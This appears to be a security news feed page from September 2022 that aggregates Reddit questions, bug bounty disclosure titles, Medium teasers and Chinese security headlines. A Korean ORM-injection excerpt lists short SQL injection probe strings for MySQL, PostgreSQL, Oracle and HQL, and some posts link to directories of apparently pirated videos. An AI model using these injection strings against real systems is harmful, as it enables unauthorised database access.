    For about the last 2 weeks, my network has been going offline a few times a day. I've switched routers (both Netgear brand), called my ISP (Spectrum) several times and gotten no where. The logs on my Netgear router are filled with messages like the following: [DoS attack: FIN Scan] (6) attack packets in last 20 sec from ip [35.186.224.25], Thursday, Sep 08,2022 16:28:22 [DoS attack: FIN Scan] (5) attack packets in last 20 sec from ip [35.186.224.25], Thursday, Sep 08,2022 16:28:01 [DoS attack: FIN Scan] (1) attack packets in last 20 sec from ip [35.186.224.25], Thursday, Sep 08,2022 16:27:33 [DoS attack: FIN Scan] (9) attack packets in last 20 sec from ip [35.186.224.25], Wednesday, Sep 07,2022 23:08:54 [DoS attack: FIN Scan] (9) attack packets in last 20 sec from ip [35.186.224.25], Wednesday, Sep 07,2022 23:08:25 [DoS attack: FIN Scan] (11) attack packets in last 20 sec from ip [35.186.224.25], Wednesday, Sep 07,2022 23:08:05 [DoS attack: FIN Scan] (10) attack packets in last 20 sec from ip [35.186.224.25], Wednesday, Sep 07,2022 23:07:44 [DoS attack: FIN Scan] (9) attack packets in last 20 sec from ip [35.186.224.25], Wednesday, Sep 07,2022 23:07:23 [DoS attack: FIN Scan] (2) attack packets in last 20 sec from ip [35.186.224.25], Wednesday, Sep 07,2022 23:07:01 [DoS attack: FIN Scan] (1) attack packets in last 20 sec from ip [35.186.224.25], Wednesday, Sep 07,2022 23:05:01 [DoS attack: ACK Scan] (1) attack packets in last 20 sec from ip [142.250.190.74], Wednesday, Sep 07,2022 23:02:28 [DoS attack: FIN Scan] (1) attack packets in last 20 sec from ip [107.178.240.159], Wednesday, Sep 07,2022 23:01:43 Any ideas on what to try? Spectrum says everything looks fine on their end but this is frustrating. Edit to clarify: all devices on the network lose internet connectivty when these messages populate. Phones, desktop PCs, laptops, smart speakers. Edit for detail: Router Models tested: Netgear Nighthawk 5000, Netgear Nighthawk 7000 submitted by /u/byrd424 [link] [comments]
    For a while I would constantly search inappropriate stuff on my school computer and I got away with it. Should I be worrying about this ever coming back to bite me?
    I when I started high school my school gave me a personal computer to work from home and I used to search a lot of porn on it. I know it was dumb and I stopped a while ago but I've been worrying whether or not they would ever report me to the principal for it. It's been years and I never got in trouble or talked to about it so I assume if someone at IT did see it they didn't care. My schoolboard usually never cares about what students do with computers as long as it's used for schoolwork and nothing illegal is done with it, for example I had a friend who used to always search up really bad stuff like suicide methods constantly at the school on school wifi and they never even brought it up to him. Despite this I still constantly worry because my mom works as secretary at my school so if something about me gets reported to the principle she will instantly know about it. submitted by /u/Puhskintius23 [link] [comments]
  • Open

    API pentest with Burp Suite without 3rd party tools such as Postman
    I've found interesting article about API pentest https://www.mindpointgroup.com/blog/rest-assured-penetration-testing-rest-apis-using-burp-suite-part-1-introduction-configuration For blackbox tests, however, we’ll have to build our packets through trial and error using API debugging/mapping tools, such as Postman, and by capturing valid requests/responses using Burp Suite as a proxy service. I was wondering: Why Postman is required? What is Burp limitation for API pentest? Most of API pentest tutorial require combination of Burp + other tools such as Postman Is it possible to perform API pentest with only Burp, without Postman or similar tools? submitted by /u/w0lfcat [link] [comments]
    Looking to move from blue->red with rusty coding skills
    I'm looking to make a career move. I'm 45 and currently managing a blue team of 15 analysts. I have a background in system admin, security admin/engineering, Web application development, security apps with WAF, etc. I want to move to red team, but it's been a while and my coding is rusty. I feel like I can get back to proficiency in pretty short order. Any thoughts on how difficult the transition would be for someone like me? submitted by /u/WTFCanID0 [link] [comments]
    Profiling DEV-0270: PHOSPHORUS’ ransomware operations - Microsoft Security Blog
    submitted by /u/dmchell [link] [comments]
  • Open

    Red Team Introduction — Try Hack Me
    Hello World and welcome to HaXeZ, in this post I’m going to be talking about the new Red Team learning path produced by TryHackMe… Continue reading on Medium »
    Red Team Tools: Hunting for the Top 3 Tools
    By Cyborg Security Continue reading on Medium »
  • Open

    Fuzzing beyond memory corruption: Finding more classes of bugs automatically
    Article URL: https://security.googleblog.com/2022/09/fuzzing-beyond-memory-corruption.html Comments URL: https://news.ycombinator.com/item?id=32771755 Points: 1 # Comments: 0
    Fuzzing JavaScript with open-source tools (live)
    Article URL: https://www.youtube.com/watch?v=Qr6mOm37kNM Comments URL: https://news.ycombinator.com/item?id=32765698 Points: 2 # Comments: 0
    Fuzzing JavaScript with open-source tools (live stream)
    Article URL: https://www.code-intelligence.com/webinar/javascript-fuzzing Comments URL: https://news.ycombinator.com/item?id=32763937 Points: 3 # Comments: 0
  • Open

    Credential Gathering From Third-Party Software
    Users often store passwords in third-party software for convenience – but credential gathering techniques can target this behavior. The post Credential Gathering From Third-Party Software appeared first on Unit 42.
  • Open

    Cross Site Scripting (XSS) for Beginners with Explanation!
    ➜XSS (Cross Site Scripting) Continue reading on Medium »
  • Open

    Attacking Firecracker: AWS' microVM Monitor Written in Rust
    submitted by /u/Gallus [link] [comments]
    Riding the InfoRail to Exploit Ivanti Avalanche – Part 2
    submitted by /u/0xdea [link] [comments]
    Understanding Windows Containers Communication - And a new OSS tool! RPCMon
    submitted by /u/jat0369 [link] [comments]
    cobaltstrike-headless: (mostly) functional headless cobalt strike client.
    submitted by /u/0xdea [link] [comments]
    Shiba Inu Crypto cloud credentials leaked on a public repository!
    submitted by /u/apprakash [link] [comments]
    Fork Bomb for Flutter
    submitted by /u/lmpact_ [link] [comments]
    Bypass Credential Exfiltration Detection - Hacking The Cloud
    submitted by /u/RedTermSession [link] [comments]
    Exploiting Laravel based applications with leaked APP_KEYs and Queues
    submitted by /u/Gallus [link] [comments]
    A dangerous way to fix Integer Overflow in Solidity
    submitted by /u/boxiso6989 [link] [comments]
    Monkey 365 is a plugin-based PowerShell module that can be used to review the security posture of your Microsoft cloud environment.
    submitted by /u/sanitybit [link] [comments]
    Attacks on Sysmon Revisited - SysmonEnte
    submitted by /u/sanitybit [link] [comments]
  • Open

    SecWiki News 2022-09-08 Review
    appshark:自动化漏洞及隐私合规检测工具 by ourren EasyPen: 图形化安全巡检与应急工具 by ourren 存储桶学习与漏洞挖掘 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-09-08 Review
    appshark:自动化漏洞及隐私合规检测工具 by ourren EasyPen: 图形化安全巡检与应急工具 by ourren 存储桶学习与漏洞挖掘 by ourren 更多最新文章,请访问SecWiki
  • Open

    What Is Clickjacking and How Do I Prevent It?
    There are a plethora of techniques that attackers use to redirect site visitors and harvest sensitive information on compromised websites. But when most webmasters think about securing their website, they often don’t think about how attackers can inject clicks on it from another site. In today’s article, we’ll explain what clickjacking is, outline the types of clickjacking attacks, describe some examples of what clickjacking looks like, and provide tips on how to prevent clickjacking on your site. Continue reading What Is Clickjacking and How Do I Prevent It? at Sucuri Blog.
  • Open

    Windows Settings says Bitlocker is disabled but its still active
    I encountered a Lenovo Notebook, where the Windows Bitlocker encryption settings showed that Bitlocker is disabled. I then booted a Linux system and it couldn't mount the Windows partition. When I checked the partition header it indicated Bitlocker encryption as follows |.X.-FVE-FS-.....| Now I'm wondering why Windows says Bitlocker is disabled but somehow it is still active. Can you explain this behavior and maybe share some article / blog post about this? submitted by /u/F-2016 [link] [comments]
    Does someone knows which forensics company delivers this piece of hardware?
    submitted by /u/Organic-Cover9407 [link] [comments]
  • Open

    The Crucial Role of Data Center Resiliency in Business Security
    For many organizations, data center operations are handled by the facilities team or a third-party vendor. Although these functions aren’t part of the everyday responsibilities of the IT or Security departments, they are crucial to systems availability and to the ongoing operations of the business. Having a full understanding of the capacity and capabilities of... The post The Crucial Role of Data Center Resiliency in Business Security appeared first on TrustedSec.
  • Open

    Vulnerability that could take the entire Avalanche network down at no cost
    Article URL: https://twitter.com/peter_szilagyi/status/1567835617932808193 Comments URL: https://news.ycombinator.com/item?id=32764435 Points: 1 # Comments: 0
  • Open

    FreeBuf早报 | 数万人被虚假的苹果发布会直播欺骗;TikTok否认黑客窃取其数据
    TikTok否认用户数据和源代码被窃,并称黑客论坛分享的源代码根本不是其平台的后台源代码,并从未与微信数据合并。
    正式开源!无恒实验室推出appshark自动化漏洞及隐私合规检测工具
    无恒实验室自主研发了appshark引擎,用于漏洞及隐私合规风险的自动化检测。
    正式开源!无恒实验室推出appshark自动化漏洞及隐私合规检测工具
    无恒实验室自主研发了appshark引擎,用于漏洞及隐私合规风险的自动化检测。
    网信办发布《网信部门行政执法程序规定(征求意见稿)》
    《规定》共五章五十六条,对于网信部门制度建设、管辖范围、适用细则、执法措施、行政处罚的普通程序、执行与结案等方面皆有相应的规范和要求。
    Gartner发布2022云Web应用程序和API保护魔力象限
    当前,云Web应用程序和API保护市场迅速增长。
    新型隐形恶意软件Shikitega正针对Linux系统
    该恶意软件可利用多阶段感染链来针对端点和物联网设备。
  • Open

    VMware 系列产品之身份验证绕过和 JDBC 注入漏洞分析
    作者:xxhzz@星阑科技PortalLab 原文链接:https://mp.weixin.qq.com/s/-NW2gjwCP5R_UwCa7eDc_A 前言 在此前分析了CVE-2022-22972 VMware Workspace ONE Access和CVE-2022-22954 VMware Workspace ONE Access SSTI RCE之后,发现当时的安全公告中同时...
    CVE-2022-0540 Jira 身份验证绕过漏洞分析
    作者:xxhzz@星阑科技PortalLab 原文链接:https://mp.weixin.qq.com/s/fEhzBTl3SVVE072ubwi6EA 前言 在上篇分析CVE-2022-26135Atlassian Jira Mobile Plugin SSRF漏洞之后,发现在此之前,jira也曾爆出过身份验证绕过漏洞,CVE编号为cve-2022-0540。趁着环境还热乎,对其产生的原...
    PyPI 网络钓鱼活动 | JuiceLedger 黑客从虚假应用转向供应链攻击
    作者:AMITAI BEN SHUSHAN EHRLICH 译者:知道创宇404实验室翻译组 原文链接:https://www.sentinelone.com/labs/pypi-phishing-campaign-juiceledger-threat-actor-pivots-from-fake-apps-to-supply-chain-attacks/ 执行摘要 1.JuiceLedge...
  • Open

    VMware 系列产品之身份验证绕过和 JDBC 注入漏洞分析
    作者:xxhzz@星阑科技PortalLab 原文链接:https://mp.weixin.qq.com/s/-NW2gjwCP5R_UwCa7eDc_A 前言 在此前分析了CVE-2022-22972 VMware Workspace ONE Access和CVE-2022-22954 VMware Workspace ONE Access SSTI RCE之后,发现当时的安全公告中同时...
    CVE-2022-0540 Jira 身份验证绕过漏洞分析
    作者:xxhzz@星阑科技PortalLab 原文链接:https://mp.weixin.qq.com/s/fEhzBTl3SVVE072ubwi6EA 前言 在上篇分析CVE-2022-26135Atlassian Jira Mobile Plugin SSRF漏洞之后,发现在此之前,jira也曾爆出过身份验证绕过漏洞,CVE编号为cve-2022-0540。趁着环境还热乎,对其产生的原...
    PyPI 网络钓鱼活动 | JuiceLedger 黑客从虚假应用转向供应链攻击
    作者:AMITAI BEN SHUSHAN EHRLICH 译者:知道创宇404实验室翻译组 原文链接:https://www.sentinelone.com/labs/pypi-phishing-campaign-juiceledger-threat-actor-pivots-from-fake-apps-to-supply-chain-attacks/ 执行摘要 1.JuiceLedge...
  • Open

    New technique 403 bypass lyncdiscover.microsoft.com
    Hi I have been working on the HTTP protocol for some time. After checking and researching, I found out that version 1.0 of the HTTP… Continue reading on InfoSec Write-ups »
    403 bypass lyncdiscover.microsoft.com
    Hi I have been working on the HTTP protocol for some time. After checking and researching, I found out that version 1.0 of the HTTP… Continue reading on Medium »
    Proper communication in cybersecurity is essential.
    1. Malware Analysis involves writing reports. 2. Access Management involves writing reports. 3. Bug Bounty Hunting involves writing… Continue reading on Medium »
    27 ways to learn ethical hacking for free:
    1. Root Me — Challenges. 2. Stök’s YouTube — Videos. 3. Hacker101 Videos — Videos. 4. InsiderPhD YouTube — Videos. 5. EchoCTF —… Continue reading on Medium »
    OSINT Information Gathering with Informer
    As everyone knows information gathering in cyber security and ethical hacking is very important. The more you know about the target, the… Continue reading on Medium »

  • Open

    What qualifications and certs are worth getting?
    Been working inhouse cybersecurity for around 3 years now and so far only have a uni degree in this discipline. Was thinking of getting the following before the end of this calendar year 2022 CompTIA Security+ CCSK Next year, I was thinking maybe OSCP or CISSP What are your thoughts? submitted by /u/securm0n [link] [comments]
    Which is better after a security enhancement? (Windows vs Linux)
    We all know that most malware is written to work on Windows. But I think, with security awareness and proper defense mechanisms Windows can be secure as Linux. (I haven't much knowledge about Windows security but I am estimating) I have been using Linux for years and also I am a fan of it. Here are we have any security professionals to explain after security hardening and awareness which can be more secure? Most endpoint devices in the corporates use Linux as I have seen so I think more hardening techniques and products are available for Windows because of that I am asking this, is it possible to have a more secure system with a Windows device rather than Linux? submitted by /u/pacman0026 [link] [comments]
    Create a notification when somebody opens the folder on Sharepoint
    Hi there Do you know how to create a notification when somebody opens the folder on Sharepoint? I found that it probably can be done via O365 Cloud Apps. But I can make a notification when somebody opens the file. But I need to alert when somebody opens the folder and everything that is under this folder/subfolders and so on. submitted by /u/athanielx [link] [comments]
    SQLi Decoding Payload Feasibility
    Hi! I'm currently researching a specific scenario with SQL injections where the target application is able to validate if internal MySQL table names (e.g., information_schema.tables) make any appearance in the SQL query. The obfuscation schemes I have come across are rather for bypassing an IDS/WAF and most of theme would not make sense to appear in a normalized form of a SQL query within the application (e.g., an empty comment in the middle of a table name (information_/**/schema.tables) is not valid SQL). I was wondering if it is technically possible in SQL to build a SQLi payload that decodes a table name from an encoded string and where another query is executed on the decoded table name string - similar to Shellcode decoding/encoding schemes. My current understanding is that this cannot work as table names in a FROM clause cannot be strings but I'm not sure if there is perhaps a MySQL function or mechanism that would make such a payload possible? submitted by /u/TolgaDevSec [link] [comments]
    Looking for a disposable email service that can reuse email addresses
    I am in need of help finding the perfect disposable email service. I want something cheap/free, does not self-destruct emails until deleted, and offers multiple domain options. Any advice? submitted by /u/CandleAggressive5299 [link] [comments]
  • Open

    Exploiting Flipper Zero NFC file loader
    submitted by /u/VVX7 [link] [comments]
    BSidesLV 2022 Conference Recordings
    View the talk schedule here, and then jump into the corresponding playlist: Breaking Ground Common Ground Ground Floor Ground Truth Hire Ground I Am The Cavalry Passwords Con Proving Ground submitted by /u/sanitybit [link] [comments]
    SharkFest'21 Wireshark Conference Playlist - hours of free netsec and network analysis content
    submitted by /u/haveitall [link] [comments]
    Constant-Time Data Processing At a Secret Offset, Privacy and QUIC
    submitted by /u/sanitybit [link] [comments]
    How BSD Authentication Works
    submitted by /u/sanitybit [link] [comments]
    TTPs Associated With a New Version of the BlackCat Ransomware
    submitted by /u/CyberMasterV [link] [comments]
    evilgophish
    submitted by /u/edreatingmonkey [link] [comments]
    OSCP 110 - My own cheat sheet
    submitted by /u/_kawhl [link] [comments]
    Groovy Template Engine Exploitation - Notes from a real case scenario
    submitted by /u/0xdea [link] [comments]
    Zero Day Initiative — CVE-2022-34715: More Microsoft Windows NFS v4 Remote Code Execution
    submitted by /u/jeandrew [link] [comments]
    Linux CONFIG_WATCH_QUEUE LPE
    submitted by /u/Gallus [link] [comments]
    Vulnerability Management for Go
    submitted by /u/sanitybit [link] [comments]
  • Open

    Partition\$Extend\$Deleted Files
    Hi all, I’m working on a case where I see hundreds of files being modified/created from the above location. It doesn’t appear to be related to the USN journal as I’m not seeing USN in the file path. What would cause this? Research online hasn’t been all that helpful. Hoping someone can point me in the right direction. Thanks in advance. submitted by /u/hotsausce01 [link] [comments]
    TTPs Associated With a New Version of the BlackCat Ransomware
    submitted by /u/CyberMasterV [link] [comments]
  • Open

    Poliqlot XSS payload vasitəsilə bug bounty ($$$)
    Bug bounty həvəskarları üçün yazıram xüsusi olaraq — siz də standart sadə xss payloadlarını bütün bug bounty saytlarında sınamaqdan… Continue reading on Medium »
    The Difference Between Vulnerability, Threat and Risk
    Terms in the Domain of Cyber Security Continue reading on Medium »
    How I found 3 RXSS on the Lululemon bug bounty program
    Hi everybody, today i will show you how can simple technique lead you to find multiple series vulnerabilities across the whole subdomains Continue reading on InfoSec Write-ups »
    How I found 3 RXSS on the Lululemon bug bounty program
    Hi everybody, today i will show you how can simple technique lead you to find multiple series vulnerabilities across the whole subdomains Continue reading on Medium »
    Welcome Quidli
    Welcome home, Quidli! Continue reading on Medium »
    Q teams up with Immunefi to launch a bug bounty program
    We are happy to announce the launch of our bug bounty program on Immunefi. Continue reading on Q Blockchain »
    Alerta de Nuevo Bug Bounty: Bienvenidos InsureDAO
    ¡Comienza una nueva asociación con InsureDAO! Hace un par de meses, anunciamos nuestra asociación para principiantes con InsureDAO, lo que… Continue reading on Medium »
  • Open

    CVE-2020-10735: Prevent DoS by large intstr conversions
    Article URL: https://github.com/python/cpython/issues/95778 Comments URL: https://news.ycombinator.com/item?id=32753681 Points: 2 # Comments: 1
  • Open

    evilgophish
    submitted by /u/edreatingmonkey [link] [comments]
    Exotic data exfiltration
    Hey there, thought I would share my slides from #defcon #adversaryvillage : https://github.com/sourcefrenchy/DEFCON-30---Exotic-Data-Exfiltration submitted by /u/Necessary-Look-4159 [link] [comments]
  • Open

    NthLink VPN tries to hide evidence of vulnerability
    Article URL: https://twitter.com/snawoot/status/1567554873536692224 Comments URL: https://news.ycombinator.com/item?id=32753062 Points: 3 # Comments: 0
  • Open

    SecWiki News 2022-09-07 Review
    B站流式传输架构的前世今生 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-09-07 Review
    B站流式传输架构的前世今生 by ourren 更多最新文章,请访问SecWiki
  • Open

    THM: Intro to C2
    Learn the essentials of Command and Control to help you become a better Red Teamer and simplify your next Red Team assessment! Continue reading on System Weakness »
    TryHackMe Red Teaming Pathway
    TryHackMe never ceases to astound us with its unique and simple approach to teaching cybersecurity content. Continue reading on Medium »
    Security Orchestration Automation & Response
    SOAR solutions enhance cybersecurity by combining automation, orchestration, and threat data collection from multiple sources, as well as… Continue reading on Medium »
  • Open

    不成熟的黑客组织 ModernLoader 针对东欧地区发起攻击
    思科在六月发现了一个发起三次独立攻击行动的攻击者,攻击者的技术并没有高超到定制化开发工具,而是使用了现成的工具。
    多种技巧打靶HTB_Talkative
    一、信息收集1.端口扫描使用nmap进行扫描找到五个打开的 TCP 端口。有一个 Apache (80),三个 Tornado(8080、80801 和 8082),还有一些在 3000 上看起来像 HTTP 的东西。基于Apache 版本,主机可能运行 Ubuntu 22.04 jammy。Tornado是一个基于 Python 的 Web 框架,旨在在 Python 异步方法中工作。2.目录爆
    能够绕过双因子验证的钓鱼即服务平台 EvilProxy 在暗网中出现
    Resecurity 的研究人员最近发现了一个新的网络钓鱼即服务(PhaaS)平台 EvilProxy。
    FreeBuf早报 | Apache IoTDB 模块存在安全漏洞;洛杉矶联合学区遭勒索软件攻击
    开源项目Apache IoTDB grafana-connector 模块存在未授权漏洞,攻击者可通过web服务可能会获取数据库的内部结构。
    Moobot 僵尸网络“盯上了”D-Link 路由器
    MooBot 僵尸网络以易受攻击的 D-Link 路由器为目标,混合使用新旧漏洞,展开网络攻击。
    250万学生贷款记录因违规泄露
    这些泄露的个人信息,未来很有可能被攻击者在社会工程或网络钓鱼攻击活动中利用。
  • Open

    Schizophrenic MKUltra Collections and More
    http://jedi-sec.space/jedi-sec.space/docuploads/ submitted by /u/blue_Kazoo82 [link] [comments]
    Danish tv show, wipeout Denmark
    Found this which is an true gem. It even has the winter episodes which is so rare to find in good quality. This is very rare, so grab it before it’s gone https://creamy.oreos.workers.dev/0:/Wipeout.PACK.DANiSH.PDTV.XviD/ submitted by /u/manitobawater [link] [comments]
    All alex jones movies in good quality
    https://creamy.oreos.workers.dev/0:/mirrorbot/Alex%20Jones%20Movie%20Pack%20480p%20DVDRip%20x264/ submitted by /u/manitobawater [link] [comments]
    Can't use google dorks to search for certain file types anymore in search engines (google and duckduckgo)?
    You used to be able to find a plethora of open directories on the internet just by using classic google dorks like filetype:mp4 ... But for some reason this doesn't work anymore. Does anyone know why or know of an alternative search engine to comb the internet for files of a certain type? Some file extensions, like pdf and xls, still work. But mp3, mp4, epub, exe, and several others I tested are no longer searchable. Edit: Apparently, this is the link of all the file types google indexes:https://developers.google.com/search/docs/advanced/crawling/indexable-file-types I swear they used to index just about all common file types. submitted by /u/shad_x9000 [link] [comments]
  • Open

    Российские исследователи рассказали о секретных функциях поисковиков Недавно в канале русскоязычных…
    Continue reading on Medium »
    OSINT Podcasts
    I’m interested in OSINT (open source intelligence), and I listen to podcasts to keep learning. Continue reading on Medium »
  • Open

    ORM Injection
    🔍 Introduction ORM Injection은 ORM(Object Relational Mapping) Layer에서 발생하는 Injection 공격으로 SQL Injection과 밀접한 연관성을 가지고 있습니다. ORM(Object Relational Mapping)은 소스코드 상의 Object와 RDBMS의 Data를 자동으로 매핑하는 기술로 Object가 영속성(Persistence)를 가질게 할 수 있습니다. 대표적으로 Hibernate, Laravel의 Eloquent, Django/Rails의 ActiveRecord 등이 있습니다. 공격자는 ORM 도구로 생성된 database access layer 코드에 존재하는 취약점이나 개발자가 ORM을 활용하는 과정에서의 문제점들을 이용해 SQL Command를 Injection할 수 있습니다. ORM 도구나 프레임워크를 사용하고, 데이터의 Access Layer를 사용한다는 점으 제외하면 SQL Injection과 거의 유사합니다. 🗡 Offensive techniques Detect ORM을 사용하는 서비스의 경우 상대적으로 SQL Query를 직접 사용하는 어플리케이션 보단 안전할 수 있습니다. 다만 Object에 매핑된 기능을 처리하는 과정에서 개발자가 실수할 수도 있고 구버전의 ORM 프레임워크 등을 사용하는 경우 알려진 공개 취약점에 의해 영향받을 수 있습니다. ORM이 자주 활용되는 프레임워크로 만들어진 어플리케이션의 경우 관련 공개 취약점과 구현된 부분에 대한 테스팅으로 식별할 수 있습니다. Ruby on Rails Django Laravel JPA(Hibernate) 등 Wappalyzer 같은 도구를 활용하면 쉽게 서비스를 식별할 수 있습니다. 나머지 테스팅 부분은 SQL Injection과 동일합니다. Magic Functions DBMS SQL Injection MySQL abc\' INTO OUTFILE -- PostgreSQL $$='$$=chr(61)\|\|chr(0x27) and 1=pg_sleep(2)\|\|version()' Oracle NVL(TO_CHAR(DBMS_XMLGEN.getxml('select 1 where 1337>1')),'1')!='1' MS SQL 1 SQL Injection > Exploitation 참고 HQL Enum Columns from BlogPosts where title like '%' and DOESNT_EXIST=1 and ''='%'...
  • Open

    String length restriction byepass at https://callerfeel.mtnonline.com/profile/feedback.html
    MTN Group disclosed a bug submitted by aliyugombe: https://hackerone.com/reports/1638347
  • Open

    Spring Cloud Function SpEL 表达式注入
    作者:VLab扫地僧@墨云科技VLab Team 原文链接:https://mp.weixin.qq.com/s/MiKWnGuyXTTLQVKjq2E_Gw 漏洞概述 Spring Cloud Function 是基于Spring Boot 的函数计算框架(FaaS),该项目提供了一个通用的模型,用于在各种平台上部署基于函数的软件,包括像 Amazon AWS Lambda 这样的 Faa...
  • Open

    Spring Cloud Function SpEL 表达式注入
    作者:VLab扫地僧@墨云科技VLab Team 原文链接:https://mp.weixin.qq.com/s/MiKWnGuyXTTLQVKjq2E_Gw 漏洞概述 Spring Cloud Function 是基于Spring Boot 的函数计算框架(FaaS),该项目提供了一个通用的模型,用于在各种平台上部署基于函数的软件,包括像 Amazon AWS Lambda 这样的 Faa...

  • Open

    Bug Bounty { How I found an SSRF ( Reconnaissance ) }
    Hello everyone, I am S Rahul, working as a Information Security Analyst at NUK 9 Auditors and A Bug bounty hunter at Hackerone, Bugcrowd… Continue reading on System Weakness »
    Bug Bounty { How I found an SSRF ( Reconnaissance ) }
    Hello everyone, I am S Rahul, working as a Information Security Analyst at NUK 9 Auditors and A Bug bounty hunter at Hackerone, Bugcrowd… Continue reading on Medium »
    New Bug Bounty Alert: Welcome InsureDAO
    A new partnership with InsureDAO begins! A couple months back we announced our beginner partnership with InsureDAO allowing projects to be… Continue reading on Medium »
    All about: Cross-Site Request Forgery
    What is CSRF? Continue reading on Medium »
    Exploiting Out-of-Band XXE in the Wild
    Hello all, I hope you’re fine! Our story today is about one of the most interesting bugs I found, actually, it’s my first time finding… Continue reading on Medium »
    What would I do if I start bug hunting from 0 again?
    Hi everyone, Continue reading on Medium »
  • Open

    Help With Psort.py -> ELK
    Good afternoon, I'm getting the following error when trying to output psort to ELK https://preview.redd.it/4yzce6gisam91.png?width=907&format=png&auto=webp&s=34e57efd80265b20ab5972b8a12f568cf4cbbcda I've done pip install --upgrade pyelasticsearch, but it is still saying that pyelasticsearch is unsupported. Any help is appreciated. Thanks, DBR submitted by /u/DeadBirdRugby [link] [comments]
    FTK imager is returning different hashes
    Hello guys, I am not an expert in this field, hopefully, I get help from you. I do have a question: ​ I created forensic images of a hard drive via FTKimager. Actually, I created two images, one for records and the second one to work on it. The issue is the forensic images have different hashes and I haven't touched the data on the hard disk imaged. Is this something expected? I checked the .txt file that FTK creates and the Hash didn't match in the two images. ​ Thanks in advance! submitted by /u/ampenate [link] [comments]
    I have two Android devices to play with, what would be some good forensics software to lean on?
    I have two Android devices and I'd like to explore some Android forensics. One of them, however, I don't know the passcode to. I assume everything will be encrypted on the one I can't unlock? Can I even get an image off of it? submitted by /u/RobbieRigel [link] [comments]
    Investigation
    Hi, everyone! I'm new in this field, and i try to practice some stuff. I wondered if i get image of a disk, then can i get access to it in virtual machine environment? Like VirtualBox or Hyper-V? Because I tried both of them but unfortunately I kept getting errors and errors so I'm here asking from ones who has experience :') submitted by /u/symbolofperfection [link] [comments]
    Help with figuring out odd RDP event
    Hey y'all, I am struggling to come to a conclusion about an RDP event I have noted in a job. Log was identified on a Microsoft RDS server (lets call it WIN-RDS), it was an Event ID 21. WIN-RDS has internal IP of 10.1.1.10 and an external IP of 192.178.1.1 The associated Windos Event ID on WIN-RDS is 21 and states the source network address is 192.178.1.1.... remeber that WIN-RDS has captured this event log and 192.178.1.1 is its own public IP address... ​ Anyone able to shine some light onto how an RDP session can happen on the RDS from its own Public IP??? I am struggling to find anything to help my cause and really dont want to put it down as an anomaly as malicious activity happened during this RDP session. submitted by /u/Phorc3 [link] [comments]
  • Open

    What kind of user activity or suspicious machine do you look out for and how?
    Currently in my organisation, I frequently check to see if anyone tried logging in from overseas from unknown countries and it then causes a high number of alerts in 365 defender. Other suspicious activity I look out for are contractors that want to access shares. USB ports are disabled by default, anyone who wants to use a USB needs to seek approval, usually do grill a bit as USB is frowned upon IMO and then only give them temp access What other activities do you look for in your organisation and how? Thanks submitted by /u/securm0n [link] [comments]
    Is there a Mitre Att&ck mapping to NIST Threat Events?
    For those of you who are familiar with Risk Assessment frameworks, I am wondering if any of you are aware of any mapping between Threat Events (e.g. using NIST 800-30) and the Mitre Att&ck techniques. I am essentially looking for something similar to the following: NIST Threat Event X = Mitre Att&ck techniques 1, 3 & 5. NIST Threat Event Y = Mitre Att&ck techniques 6 & 8. ...or vice versa. ​ Link to references: NIST Threat Events: https://nvlpubs.nist.gov/nistpubs/legacy/sp/nistspecialpublication800-30r1.pdf Mitre Att&ck Matrix for Enterprise: https://attack.mitre.org submitted by /u/EmergencyShow [link] [comments]
  • Open

    Reflected Xss in []
    U.S. Dept Of Defense disclosed a bug submitted by s1m0x1: https://hackerone.com/reports/1033253
    Reflected cross site scripting in https://
    U.S. Dept Of Defense disclosed a bug submitted by maskedpersian: https://hackerone.com/reports/1636345
    RXSS on
    U.S. Dept Of Defense disclosed a bug submitted by tmz900: https://hackerone.com/reports/1627616
    solr_log4j - http://
    U.S. Dept Of Defense disclosed a bug submitted by hachimanxienim: https://hackerone.com/reports/1631370
    _log4j - https://
    U.S. Dept Of Defense disclosed a bug submitted by hachimanxienim: https://hackerone.com/reports/1631364
    Stored XSS at https://
    U.S. Dept Of Defense disclosed a bug submitted by shanekag: https://hackerone.com/reports/1620247
    RXSS on
    U.S. Dept Of Defense disclosed a bug submitted by tmz900: https://hackerone.com/reports/1626962
    Access to admininstrative resources/account via path traversal
    U.S. Dept Of Defense disclosed a bug submitted by j4k3d: https://hackerone.com/reports/1326352
    XSS DUE TO CVE-2020-3580
    U.S. Dept Of Defense disclosed a bug submitted by cruxn3t: https://hackerone.com/reports/1606068
    The dashboard is exposed in https://
    U.S. Dept Of Defense disclosed a bug submitted by alitoni224: https://hackerone.com/reports/1566758
    Subdomain takeover of
    U.S. Dept Of Defense disclosed a bug submitted by martinvw: https://hackerone.com/reports/1457928
    Modifying Sprunk vs eCola crew data
    Rockstar Games disclosed a bug submitted by bugstar: https://hackerone.com/reports/1680818 - Bounty: $250
    IDOR Payments Status
    Omise disclosed a bug submitted by codeslayer137: https://hackerone.com/reports/1538669 - Bounty: $100
  • Open

    Sensitive Command Token - So much offense in my defense
    submitted by /u/0xdea [link] [comments]
    Ryuk Ransomware: History, Timeline, and Adversary Simulation
    submitted by /u/achilles4828 [link] [comments]
    Vulnerability Analysis of CVE-2018-12613 – phpMyAdmin 4.8.1 Remote Code Execution
    submitted by /u/sandeep1337 [link] [comments]
    23 year old Denial of Service bug in Curl
    submitted by /u/sanitybit [link] [comments]
    Unpatched Unauthenticated Blind SSRF in WordPress Core
    submitted by /u/monoimpact [link] [comments]
    How to turn security research into profit: a CL.0 case study
    submitted by /u/albinowax [link] [comments]
    Hardware debug probes for JTAG debugging for Intel and AMD - Necrosys/x86-JTAG-Information
    submitted by /u/Gallus [link] [comments]
    TA505 Group's TeslaGun In-Depth Analysis
    submitted by /u/wtfse [link] [comments]
    SAT/SMT Solvers by Example
    submitted by /u/ambray_ [link] [comments]
  • Open

    Attacking GPP (Group Policy Preferences) Credentials | Active Directory Pentesting
    A very common and easy attack that provides user credentials stored in SYSVOL share that can be used to get a shell or escalate privileges. Continue reading on Medium »
    Erro: /bin/bash^M: bad interpreter: No such file or directory (Linux).
    Olá Comunidade, me deparei com um erro “/bin/bash^M: bad interpreter”recentemente em um projeto do github, vou compartilhar com vocês como… Continue reading on Medium »
  • Open

    some software and stuff
    http://37.156.146.163/PUB/ submitted by /u/Deafcon2018 [link] [comments]
    Open iAVATAR files?
    I downloaded some models I wanted to use for a project, but they’re all iAVATAR files and I have no idea how to open these. submitted by /u/32mafiaman [link] [comments]
  • Open

    SX August 2022 Report
    Volume, Key Metrics and Projections for September Continue reading on SX Network »
  • Open

